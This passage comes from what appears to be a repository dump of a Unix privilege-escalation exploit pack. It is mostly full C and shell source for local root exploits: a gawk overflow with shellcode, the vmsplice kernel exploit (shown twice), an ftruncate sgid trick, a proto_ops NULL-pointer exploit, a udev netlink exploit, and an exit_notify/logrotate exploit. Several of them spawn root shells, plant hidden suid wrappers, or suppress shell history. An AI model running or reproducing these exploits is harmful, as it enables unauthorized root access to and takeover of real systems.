EGGSIZE - strlen(shellcode) -1; c++) 56 | *(pointer++) = NOP; 57 | 58 | for(c = 0; c < strlen(shellcode); c++) 59 | *(pointer++) = shellcode[c]; 60 | 61 | egg[EGGSIZE -1] = '\0'; 62 | buffer[bsize -1] = '\0'; 63 | 64 | memcpy(buffer, "RET=", 4); putenv(buffer); 65 | memcpy(egg, "EGG=", 4); putenv(egg); 66 | 67 | system("/usr/bin/compress $RET"); 68 | 69 | 
return 0; 70 | } 71 | -------------------------------------------------------------------------------- /2007/gawk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/gawk -------------------------------------------------------------------------------- /2007/gawk_expl.c: -------------------------------------------------------------------------------- 1 | 2 | /* local GNU Awk 3.1.0-x proof of concept exploit */ 3 | 4 | #include 5 | #include 6 | 7 | void aborted(int); 8 | 9 | char shellcode[] = 10 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 11 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 12 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 13 | 14 | int 15 | main() 16 | { 17 | unsigned long ret = 0xbffffd30; 18 | char buf[8214]; 19 | char egg[1024]; 20 | char *ptr; 21 | 22 | int i=0; 23 | 24 | memset(buf,0x90,sizeof(buf)); 25 | ptr = egg; 26 | 27 | for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = '\x90'; 28 | for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; 29 | 30 | egg[1024 - 1] = '\0'; 31 | memcpy(egg,"EGG=",4); 32 | putenv(egg); 33 | 34 | buf[8209] = (ret & 0x000000ff); 35 | buf[8210] = (ret & 0x0000ff00) >> 8; 36 | buf[8211] = (ret & 0x00ff0000) >> 16; 37 | buf[8212] = (ret & 0xff000000) >> 24; 38 | buf[8213] = 0x00; 39 | 40 | printf("local GNU Awk 3.1.0-x proof of concept exploit\n"); 41 | printf("ret: 0x%x\n",ret); 42 | printf("buf: %d\n\n",strlen(buf)); 43 | 44 | execl("/usr/bin/gawk", "gawk", "-f" , buf, NULL); 45 | } 46 | -------------------------------------------------------------------------------- /2007/w00t.so.1.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/w00t.so.1.0 
-------------------------------------------------------------------------------- /2008/1-2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/1-2008 -------------------------------------------------------------------------------- /2008/16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/16 -------------------------------------------------------------------------------- /2008/2.4.36.92.6.27.5 - 2008 Local root: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.4.36.92.6.27.5 - 2008 Local root -------------------------------------------------------------------------------- /2008/2.6.17-18-19-20-24: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.17-18-19-20-24 -------------------------------------------------------------------------------- /2008/2.6.18-164: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.18-164 -------------------------------------------------------------------------------- /2008/2.6.22: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.22 
-------------------------------------------------------------------------------- /2008/2.6.23: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2008/2.6.23-2.6.24.c: -------------------------------------------------------------------------------- 1 | /* 2 | * diane_lane_fucked_hard.c 3 | * 4 | * Linux vmsplice Local Root Exploit 5 | * By qaaz 6 | * 7 | * Linux 2.6.23 - 2.6.24 8 | */ 9 | #define _GNU_SOURCE 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #define TARGET_PATTERN " sys_vm86old" 18 | #define TARGET_SYSCALL 113 19 | 20 | #ifndef __NR_vmsplice 21 | #define __NR_vmsplice 316 22 | #endif 23 | 24 | #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) 25 | #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) 26 | 27 | #define TRAMP_CODE (void *) trampoline 28 | #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) 29 | 30 | unsigned char trampoline[] = 31 | "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ 32 | "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ 33 | "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ 34 | "\x75\x02" /* jne +2 */ 35 | "\xff\xd1" /* call *%ecx */ 36 | "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ 37 | "\xc3" /* ret */ 38 | ; 39 | 40 | void die(char *msg, int err) 41 | { 42 | printf(err ? 
"[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); 43 | fflush(stdout); 44 | fflush(stderr); 45 | exit(1); 46 | } 47 | 48 | long get_target() 49 | { 50 | FILE *f; 51 | long addr = 0; 52 | char line[128]; 53 | 54 | f = fopen("/proc/kallsyms", "r"); 55 | if (!f) die("/proc/kallsyms", errno); 56 | 57 | while (fgets(line, sizeof(line), f)) { 58 | if (strstr(line, TARGET_PATTERN)) { 59 | addr = strtoul(line, NULL, 16); 60 | break; 61 | } 62 | } 63 | 64 | fclose(f); 65 | return addr; 66 | } 67 | 68 | static inline __attribute__((always_inline)) 69 | void * get_current() 70 | { 71 | unsigned long curr; 72 | __asm__ __volatile__ ( 73 | "movl %%esp, %%eax ;" 74 | "andl %1, %%eax ;" 75 | "movl (%%eax), %0" 76 | : "=r" (curr) 77 | : "i" (~8191) 78 | ); 79 | return (void *) curr; 80 | } 81 | 82 | static uint uid, gid; 83 | 84 | void kernel_code() 85 | { 86 | int i; 87 | uint *p = get_current(); 88 | 89 | for (i = 0; i < 1024-13; i++) { 90 | if (p[0] == uid && p[1] == uid && 91 | p[2] == uid && p[3] == uid && 92 | p[4] == gid && p[5] == gid && 93 | p[6] == gid && p[7] == gid) { 94 | p[0] = p[1] = p[2] = p[3] = 0; 95 | p[4] = p[5] = p[6] = p[7] = 0; 96 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 97 | p[0] = p[1] = p[2] = ~0; 98 | break; 99 | } 100 | p++; 101 | } 102 | } 103 | 104 | int main(int argc, char *argv[]) 105 | { 106 | int pi[2]; 107 | long addr; 108 | struct iovec iov; 109 | 110 | uid = getuid(); 111 | gid = getgid(); 112 | setresuid(uid, uid, uid); 113 | setresgid(gid, gid, gid); 114 | 115 | printf("-----------------------------------\n"); 116 | printf(" Linux vmsplice Local Root Exploit\n"); 117 | printf(" By qaaz\n"); 118 | printf("Modified By : HACKERS PAL \n"); 119 | printf("For WwW.SoQoR.NeT Members 2008 ..\n"); 120 | printf("-----------------------------------\n"); 121 | 122 | if (!uid || !gid) 123 | die("!@#$", 0); 124 | 125 | addr = get_target(); 126 | printf("[+] addr: 0x%lx\n", addr); 127 | 128 | if (pipe(pi) < 0) 129 | die("pipe", errno); 130 | 131 | 
iov.iov_base = (void *) addr; 132 | iov.iov_len = TRAMP_SIZE; 133 | 134 | write(pi[1], TRAMP_CODE, TRAMP_SIZE); 135 | _vmsplice(pi[0], &iov, 1, 0); 136 | 137 | gimmeroot(); 138 | 139 | if (getuid() != 0) 140 | die("wtf", 0); 141 | 142 | printf("[+] root\n"); 143 | putenv("HISTFILE=/dev/null"); 144 | execl("/bin/bash", "bash", "-i", NULL); 145 | die("/bin/bash", errno); 146 | return 0; 147 | } 148 | 149 | // milw0rm.com [2008-02-09] -------------------------------------------------------------------------------- /2008/2.6.23=2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.23=2008 -------------------------------------------------------------------------------- /2008/2.6.9-67-2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.9-67-2008 -------------------------------------------------------------------------------- /2008/2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2008 -------------------------------------------------------------------------------- /2008/2008-4210: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2008-4210 -------------------------------------------------------------------------------- /2008/2008-4210.c: -------------------------------------------------------------------------------- 1 | /* 2 | gw-ftrex.c: 3 | 4 | Linux kernel < 2.6.22 open/ftruncate local exploit 5 | by 6 | 7 | bug 
information: 8 | http://osvdb.org/49081 9 | 10 | 11 | !!!This is for educational purposes only!!! 12 | 13 | To use it, you've got to find a sgid directory you've got 14 | permissions to write into (obviously world-writable), e.g: 15 | find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx" 16 | which fortunately is not common those days :) 17 | And also a shell that does not drop sgid privs upon execution (like ash/sash). 18 | E.g: 19 | 20 | test:/fileserver/samba$ ls -ld 21 | drwxrwsrwx 2 root root 4096 2008-10-27 16:27. 22 | test:/fileserver/samba$ id 23 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 24 | test:/fileserver/samba$ /tmp/gw-ftrex 25 | ash shell found! 26 | size=80200 27 | We're evil evil evil! 28 | 29 | $ id 30 | uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data) 31 | 32 | Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia. 33 | */ 34 | 35 | 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | int main(int argc, char *argv[]) 43 | { 44 | char *buf=malloc(3096*1024); //3mb just to be sure 45 | int a,len; 46 | int fd,fd1; 47 | char *buf1; 48 | int shell=0; 49 | 50 | 51 | if (stat("/bin/ash",buf)==0) 52 | { 53 | printf("ash shell found!\n"); 54 | shell=1; 55 | } 56 | 57 | if (shell==0) if (stat("/bin/sash",buf)==0) 58 | { 59 | printf("sash shell found!\n"); 60 | shell=1; 61 | } 62 | 63 | if (shell==0) 64 | { 65 | printf("no suitable shell found (one that does not drop sgid permissions) :(\n"); 66 | exit(2); 67 | } 68 | 69 | 70 | len=0; 71 | if (shell==1) fd=open("/bin/ash",O_RDONLY); 72 | if (shell==2) fd=open("/bin/sash",O_RDONLY); 73 | 74 | while (read(fd,buf+len,1)) len++; 75 | 76 | printf("size=%d\n",len); 77 | fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750); 78 | ftruncate(fd1, len); 79 | buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0); 80 | memcpy(buf1,buf,len); 81 | munmap(buf1,len); 82 | close(fd1);close(fd); 83 | free(buf); 84 | printf("We're 
evil evil evil!\n\n"); 85 | execv(".evilsploit", NULL); 86 | } 87 | 88 | // milw0rm.com [2008-10-27] 89 | -------------------------------------------------------------------------------- /2009/2.4.AnD.2.6-2009: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2.4.AnD.2.6-2009 -------------------------------------------------------------------------------- /2009/2.6.18-128: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2.6.18-128 -------------------------------------------------------------------------------- /2009/2.6.23-2009.c: -------------------------------------------------------------------------------- 1 | /* 2 | * diane_lane_fucked_hard.c 3 | * 4 | * Linux vmsplice Local Root Exploit 5 | * By qaaz 6 | * 7 | * Linux 2.6.23 - 2.6.24 8 | */ 9 | #define _GNU_SOURCE 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #define TARGET_PATTERN " sys_vm86old" 18 | #define TARGET_SYSCALL 113 19 | 20 | #ifndef __NR_vmsplice 21 | #define __NR_vmsplice 316 22 | #endif 23 | 24 | #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) 25 | #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) 26 | 27 | #define TRAMP_CODE (void *) trampoline 28 | #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) 29 | 30 | unsigned char trampoline[] = 31 | "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ 32 | "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ 33 | "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ 34 | "\x75\x02" /* jne +2 */ 35 | "\xff\xd1" /* call *%ecx */ 36 | "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ 37 | "\xc3" /* ret */ 38 | ; 39 | 40 | void die(char *msg, int err) 41 | { 42 | 
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); 43 | fflush(stdout); 44 | fflush(stderr); 45 | exit(1); 46 | } 47 | 48 | long get_target() 49 | { 50 | FILE *f; 51 | long addr = 0; 52 | char line[128]; 53 | 54 | f = fopen("/proc/kallsyms", "r"); 55 | if (!f) die("/proc/kallsyms", errno); 56 | 57 | while (fgets(line, sizeof(line), f)) { 58 | if (strstr(line, TARGET_PATTERN)) { 59 | addr = strtoul(line, NULL, 16); 60 | break; 61 | } 62 | } 63 | 64 | fclose(f); 65 | return addr; 66 | } 67 | 68 | static inline __attribute__((always_inline)) 69 | void * get_current() 70 | { 71 | unsigned long curr; 72 | __asm__ __volatile__ ( 73 | "movl %%esp, %%eax ;" 74 | "andl %1, %%eax ;" 75 | "movl (%%eax), %0" 76 | : "=r" (curr) 77 | : "i" (~8191) 78 | ); 79 | return (void *) curr; 80 | } 81 | 82 | static uint uid, gid; 83 | 84 | void kernel_code() 85 | { 86 | int i; 87 | uint *p = get_current(); 88 | 89 | for (i = 0; i < 1024-13; i++) { 90 | if (p[0] == uid && p[1] == uid && 91 | p[2] == uid && p[3] == uid && 92 | p[4] == gid && p[5] == gid && 93 | p[6] == gid && p[7] == gid) { 94 | p[0] = p[1] = p[2] = p[3] = 0; 95 | p[4] = p[5] = p[6] = p[7] = 0; 96 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 97 | p[0] = p[1] = p[2] = ~0; 98 | break; 99 | } 100 | p++; 101 | } 102 | } 103 | 104 | int main(int argc, char *argv[]) 105 | { 106 | int pi[2]; 107 | long addr; 108 | struct iovec iov; 109 | 110 | uid = getuid(); 111 | gid = getgid(); 112 | setresuid(uid, uid, uid); 113 | setresgid(gid, gid, gid); 114 | 115 | printf("-----------------------------------\n"); 116 | printf(" Linux vmsplice Local Root Exploit\n"); 117 | printf(" By qaaz\n"); 118 | printf("-----------------------------------\n"); 119 | 120 | if (!uid || !gid) 121 | die("!@#$", 0); 122 | 123 | addr = get_target(); 124 | printf("[+] addr: 0x%lx\n", addr); 125 | 126 | if (pipe(pi) < 0) 127 | die("pipe", errno); 128 | 129 | iov.iov_base = (void *) addr; 130 | iov.iov_len = TRAMP_SIZE; 131 | 132 | write(pi[1], 
TRAMP_CODE, TRAMP_SIZE); 133 | _vmsplice(pi[0], &iov, 1, 0); 134 | 135 | gimmeroot(); 136 | 137 | if (getuid() != 0) 138 | die("wtf", 0); 139 | 140 | printf("[+] root\n"); 141 | putenv("HISTFILE=/dev/null"); 142 | execl("/bin/bash", "bash", "-i", NULL); 143 | die("/bin/bash", errno); 144 | return 0; 145 | } -------------------------------------------------------------------------------- /2009/2.6.29.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ################################################################################### 4 | # gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit 5 | # 6 | # by Milen Rangelov (gat3way-at-gat3way-dot-eu) 7 | # 8 | # Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. 9 | # Basically it allows us to send arbitrary signals to a privileged (suidroot) 10 | # parent process. Due to a bad check, the child process with appropriate exit signal 11 | # already set can first execute a suidroot binary then exit() and thus bypass 12 | # in-kernel privilege checks. We use chfn and gpasswd for that purpose. 13 | # 14 | # !!!!!!!!!!! 15 | # Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 16 | # so you'll be out of luck most of the time. 17 | # So it is not going to be the script kiddies' new killer shit :-) 18 | # !!!!!!!!!!! 19 | # 20 | # if you invent a better way to escalate privileges by sending arbitrary signals to 21 | # the parent process, please mail me :) That was the best I could think of today :-( 22 | # 23 | # This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness 24 | # 25 | # Skuchna rabota... 
26 | # 27 | #################################################################################### 28 | 29 | -------------------------------------------------------------------------------- /2009/2009-proto_ops/exploit.c: -------------------------------------------------------------------------------- 1 | /* 2 | * 14.08.2009, babcia padlina 3 | * 4 | * vulnerability discovered by google security team 5 | * 6 | * some parts of exploit code borrowed from vmsplice exploit by qaaz 7 | * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy: 8 | * http://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/ 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | static unsigned int uid, gid; 25 | 26 | #define USER_CS 0x73 27 | #define USER_SS 0x7b 28 | #define USER_FL 0x246 29 | #define STACK(x) (x + sizeof(x) - 40) 30 | 31 | void exit_code(); 32 | char exit_stack[1024 * 1024]; 33 | 34 | static inline __attribute__((always_inline)) void *get_current() 35 | { 36 | unsigned long curr; 37 | __asm__ __volatile__ ( 38 | "movl %%esp, %%eax ;" 39 | "andl %1, %%eax ;" 40 | "movl (%%eax), %0" 41 | : "=r" (curr) 42 | : "i" (~8191) 43 | ); 44 | return (void *) curr; 45 | } 46 | 47 | static inline __attribute__((always_inline)) void exit_kernel() 48 | { 49 | __asm__ __volatile__ ( 50 | "movl %0, 0x10(%%esp) ;" 51 | "movl %1, 0x0c(%%esp) ;" 52 | "movl %2, 0x08(%%esp) ;" 53 | "movl %3, 0x04(%%esp) ;" 54 | "movl %4, 0x00(%%esp) ;" 55 | "iret" 56 | : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), 57 | "i" (USER_CS), "r" (exit_code) 58 | ); 59 | } 60 | 61 | void kernel_code() 62 | { 63 | int i; 64 | uint *p = get_current(); 65 | 66 | for (i = 0; i < 1024-13; i++) { 67 | if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == 
gid) { 68 | p[0] = p[1] = p[2] = p[3] = 0; 69 | p[4] = p[5] = p[6] = p[7] = 0; 70 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 71 | p[0] = p[1] = p[2] = ~0; 72 | break; 73 | } 74 | p++; 75 | } 76 | 77 | exit_kernel(); 78 | } 79 | 80 | void exit_code() 81 | { 82 | if (getuid() != 0) { 83 | fprintf(stderr, "failed\n"); 84 | exit(-1); 85 | } 86 | 87 | execl("/bin/sh", "sh", "-i", NULL); 88 | } 89 | 90 | int main(void) { 91 | char template[] = "/tmp/padlina.XXXXXX"; 92 | int fdin, fdout; 93 | void *page; 94 | 95 | uid = getuid(); 96 | gid = getgid(); 97 | setresuid(uid, uid, uid); 98 | setresgid(gid, gid, gid); 99 | 100 | if ((personality(0xffffffff)) != PER_SVR4) { 101 | if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { 102 | perror("mmap"); 103 | return -1; 104 | } 105 | } else { 106 | if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) { 107 | perror("mprotect"); 108 | return -1; 109 | } 110 | } 111 | 112 | *(char *)0 = '\x90'; 113 | *(char *)1 = '\xe9'; 114 | *(unsigned long *)2 = (unsigned long)&kernel_code - 6; 115 | 116 | if ((fdin = mkstemp(template)) < 0) { 117 | perror("mkstemp"); 118 | return -1; 119 | } 120 | 121 | if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) { 122 | perror("socket"); 123 | return -1; 124 | } 125 | 126 | unlink(template); 127 | ftruncate(fdin, PAGE_SIZE); 128 | sendfile(fdout, fdin, NULL, PAGE_SIZE); 129 | } 130 | 131 | -------------------------------------------------------------------------------- /2009/2009-proto_ops/run.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void) { 6 | if (personality(PER_SVR4) < 0) { 7 | perror("personality"); 8 | return -1; 9 | } 10 | 11 | fprintf(stderr, "padlina z lublina!\n"); 12 | 13 | execl("./exploit", "exploit", 0); 14 | } 15 | 16 | 17 | -------------------------------------------------------------------------------- 
/2009/2009-proto_ops/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | gcc -o run run.c && \ 4 | gcc -o exploit exploit.c && \ 5 | ./run 6 | -------------------------------------------------------------------------------- /2009/2009.6.18-164: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2009.6.18-164 -------------------------------------------------------------------------------- /2009/2009.6.31_2009: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2009.6.31_2009 -------------------------------------------------------------------------------- /2009/CVE-2009-0360/CVE-2009-0360: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/CVE-2009-0360/CVE-2009-0360 -------------------------------------------------------------------------------- /2009/CVE-2009-1185.c: -------------------------------------------------------------------------------- 1 | /* 2 | * cve-2009-1185.c 3 | * 4 | * udev < 141 Local Privilege Escalation Exploit 5 | * Jon Oberheide 6 | * http://jon.oberheide.org 7 | * 8 | * Information: 9 | * 10 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 11 | * 12 | * udev before 1.4.1 does not verify whether a NETLINK message originates 13 | * from kernel space, which allows local users to gain privileges by sending 14 | * a NETLINK message from user space. 15 | * 16 | * Notes: 17 | * 18 | * An alternate version of kcope's exploit. 
This exploit leverages the 19 | * 95-udev-late.rules functionality that is meant to run arbitrary commands 20 | * when a device is removed. A bit cleaner and reliable as long as your 21 | * distro ships that rule file. 22 | * 23 | * Tested on Gentoo, Intrepid, and Jaunty. 24 | * 25 | * Usage: 26 | * 27 | * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, 28 | * usually is the udevd PID minus 1) as argv[1]. 29 | * 30 | * The exploit will execute /tmp/run as root so throw whatever payload you 31 | * want in there. 32 | */ 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | 44 | #ifndef NETLINK_KOBJECT_UEVENT 45 | #define NETLINK_KOBJECT_UEVENT 15 46 | #endif 47 | 48 | int 49 | main(int argc, char **argv) 50 | { 51 | int sock; 52 | char *mp, *err; 53 | char message[4096]; 54 | struct stat st; 55 | struct msghdr msg; 56 | struct iovec iovector; 57 | struct sockaddr_nl address; 58 | 59 | if (argc < 2) { 60 | err = "Pass the udevd netlink PID as an argument"; 61 | printf("[-] Error: %s\n", err); 62 | exit(1); 63 | } 64 | 65 | if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) && 66 | (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) { 67 | err = "Required 95-udev-late.rules not found"; 68 | printf("[-] Error: %s\n", err); 69 | exit(1); 70 | } 71 | 72 | if (stat("/tmp/run", &st) == -1) { 73 | err = "/tmp/run does not exist, please create it"; 74 | printf("[-] Error: %s\n", err); 75 | exit(1); 76 | } 77 | system("chmod +x /tmp/run"); 78 | 79 | memset(&address, 0, sizeof(address)); 80 | address.nl_family = AF_NETLINK; 81 | address.nl_pid = atoi(argv[1]); 82 | address.nl_groups = 0; 83 | 84 | msg.msg_name = (void*)&address; 85 | msg.msg_namelen = sizeof(address); 86 | msg.msg_iov = &iovector; 87 | msg.msg_iovlen = 1; 88 | 89 | sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); 90 | bind(sock, (struct sockaddr *) &address, sizeof(address)); 
91 | 92 | mp = message; 93 | mp += sprintf(mp, "remove@/d") + 1; 94 | mp += sprintf(mp, "SUBSYSTEM=block") + 1; 95 | mp += sprintf(mp, "DEVPATH=/dev/foo") + 1; 96 | mp += sprintf(mp, "TIMEOUT=10") + 1; 97 | mp += sprintf(mp, "ACTION=remove") +1; 98 | mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1; 99 | 100 | iovector.iov_base = (void*)message; 101 | iovector.iov_len = (int)(mp-message); 102 | 103 | sendmsg(sock, &msg, 0); 104 | 105 | close(sock); 106 | 107 | return 0; 108 | } 109 | 110 | // milw0rm.com [2009-04-30] 111 | -------------------------------------------------------------------------------- /2009/CVE-2009-1337.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ################################################################################### 4 | # gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit 5 | # 6 | # by Milen Rangelov (gat3way-at-gat3way-dot-eu) 7 | # 8 | # Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. 9 | # Basically it allows us to send arbitrary signals to a privileged (suidroot) 10 | # parent process. Due to a bad check, the child process with appropriate exit signal 11 | # already set can first execute a suidroot binary then exit() and thus bypass 12 | # in-kernel privilege checks. We use chfn and gpasswd for that purpose. 13 | # 14 | # !!!!!!!!!!! 15 | # Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 16 | # so you'll be out of luck most of the time. 17 | # So it is not going to be the script kiddies' new killer shit :-) 18 | # !!!!!!!!!!! 19 | # 20 | # if you invent a better way to escalate privileges by sending arbitrary signals to 21 | # the parent process, please mail me :) That was the best I could think of today :-( 22 | # 23 | # This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness 24 | # 25 | # Skuchna rabota... 
26 | # 27 | #################################################################################### 28 | 29 | 30 | 31 | 32 | SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` 33 | if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi 34 | if [ -d /etc/logrotate.d ]; then 35 | echo "logrotate installed, that's good!" 36 | else 37 | echo "No logrotate installed, sorry!";exit 38 | fi 39 | 40 | echo -e "Compiling the bash setuid() wrapper..." 41 | cat >> /tmp/.m.c << EOF 42 | #include 43 | #include 44 | 45 | int main() 46 | { 47 | setuid(0); 48 | execl("/bin/bash","[kthreadd]",NULL); 49 | } 50 | EOF 51 | 52 | cc /tmp/.m.c -o /tmp/.m 53 | rm /tmp/.m.c 54 | 55 | echo -e "Compiling the exploit code..." 56 | 57 | cat >> /tmp/exploit.c << EOF 58 | #include 59 | #include 60 | #include 61 | #include 62 | #include 63 | 64 | int child(void *data) 65 | { 66 | sleep(2); 67 | printf("I'm gonna kill the suidroot father without having root rights :D\n"); 68 | execl("/usr/bin/gpasswd","%s",NULL); 69 | exit(0); 70 | } 71 | 72 | int main() 73 | { 74 | int stacksize = 4*getpagesize(); 75 | void *stack, *stacktop; 76 | stack = malloc(stacksize); 77 | stacktop = stack + stacksize; 78 | chdir("/etc/logrotate.d"); 79 | int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); 80 | if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); 81 | } 82 | EOF 83 | 84 | cc /tmp/exploit.c -o /tmp/.ex 85 | rm /tmp/exploit.c 86 | 87 | echo -e "Setting coredump limits and running the exploit...\n" 88 | ulimit -c 10000 89 | touch /tmp/.a 90 | `/tmp/.ex >/dev/null 2>/dev/null` 91 | sleep 5 92 | rm /tmp/.ex 93 | 94 | if [ -e /etc/logrotate.d/core ]; then 95 | echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" 96 | echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" 97 | 
